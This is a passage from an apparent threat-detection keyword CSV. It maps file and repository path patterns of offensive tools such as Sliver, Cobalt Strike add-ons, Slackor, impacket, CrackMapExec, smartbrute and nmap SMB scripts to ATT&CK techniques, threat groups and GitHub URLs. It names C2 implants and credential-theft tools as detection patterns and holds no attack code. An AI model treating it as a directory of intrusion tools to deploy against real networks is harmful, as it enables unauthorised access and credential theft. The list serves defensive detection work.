that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/Slackor/*",".{0,1000}\/Slackor\/.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/sleep_python_bridge/*",".{0,1000}\/sleep_python_bridge\/.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/Sleeper/Sleeper.cna*",".{0,1000}\/Sleeper\/Sleeper\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*/sleepmask.cna*",".{0,1000}\/sleepmask\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*/slinky.py*",".{0,1000}\/slinky\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/SlinkyCat.git*",".{0,1000}\/SlinkyCat\.git.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD 
Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*/slip.git",".{0,1000}\/slip\.git","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*/slip-main.zip",".{0,1000}\/slip\-main\.zip","offensive_tool_keyword","slip","Slip is a CLI tool to create malicious archive files containing path traversal payloads","T1560.001 - T1059","TA0002 - TA0009","N/A","N/A","Exploitation Tools","https://github.com/0xless/slip","1","1","N/A","10","1","72","3","2024-04-29T15:41:52Z","2022-10-29T15:38:36Z" "*/sliver.exe*",".{0,1000}\/sliver\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver.git*",".{0,1000}\/sliver\.git.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver.pb.go*",".{0,1000}\/sliver\.pb\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red 
team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver.proto*",".{0,1000}\/sliver\.proto.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver/evasion/*",".{0,1000}\/sliver\/evasion\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver_pb2.py*",".{0,1000}\/sliver_pb2\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/sliver_pb2_grpc.py*",".{0,1000}\/sliver_pb2_grpc\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - 
TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/sliver-client.exe*",".{0,1000}\/sliver\-client\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_linux.sig*",".{0,1000}\/sliver\-client_linux\.sig.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows.exe*",".{0,1000}\/sliver\-client_windows\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows-386*.exe*",".{0,1000}\/sliver\-client_windows\-386.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an 
open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows-amd64*.exe*",".{0,1000}\/sliver\-client_windows\-amd64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-client_windows-arm64*.exe*",".{0,1000}\/sliver\-client_windows\-arm64.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliverpb.Exe*",".{0,1000}\/sliverpb\.Exe.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 
- TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/sliver-server*",".{0,1000}\/sliver\-server.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*/SlowPathMITM.py*",".{0,1000}\/SlowPathMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/smartbrute.git*",".{0,1000}\/smartbrute\.git.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","1","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*/smartbrute-main*",".{0,1000}\/smartbrute\-main.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" 
"*/smb.py*",".{0,1000}\/smb\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/smb/psexec.rb*",".{0,1000}\/smb\/psexec\.rb.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-PsExec.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*/SMB_RPC/*.py",".{0,1000}\/SMB_RPC\/.{0,1000}\.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/smb2-capabilities.nse*",".{0,1000}\/smb2\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-security-mode.nse*",".{0,1000}\/smb2\-security\-mode\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-time.nse*",".{0,1000}\/smb2\-time\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb2-vuln-uptime.nse*",".{0,1000}\/smb2\-vuln\-uptime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb3.py*",".{0,1000}\/smb3\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/smb-brute.nse*",".{0,1000}\/smb\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-cmds.txt*",".{0,1000}\/smb\-cmds\.txt.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*/SMBCrunch.git*",".{0,1000}\/SMBCrunch\.git.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","1","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "*/smb-double-pulsar-backdoor.nse*",".{0,1000}\/smb\-double\-pulsar\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/SMBeagle*",".{0,1000}\/SMBeagle.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","1","N/A","9","7","675","78","2023-07-28T09:35:30Z","2021-05-31T19:46:57Z" "*/smb-enum-domains.nse*",".{0,1000}\/smb\-enum\-domains\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-groups.nse*",".{0,1000}\/smb\-enum\-groups\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-processes.nse*",".{0,1000}\/smb\-enum\-processes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-services.nse*",".{0,1000}\/smb\-enum\-services\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-sessions.nse*",".{0,1000}\/smb\-enum\-sessions\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-shares.nse*",".{0,1000}\/smb\-enum\-shares\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smb-enum-users.nse*",".{0,1000}\/smb\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/smbexec.py*",".{0,1000}\/smbexec\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6490","759","2024-04-29T11:28:16Z","2015-08-30T07:22:51Z" "*/smb-flood.nse*",".{0,1000}\/smb\-flood\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
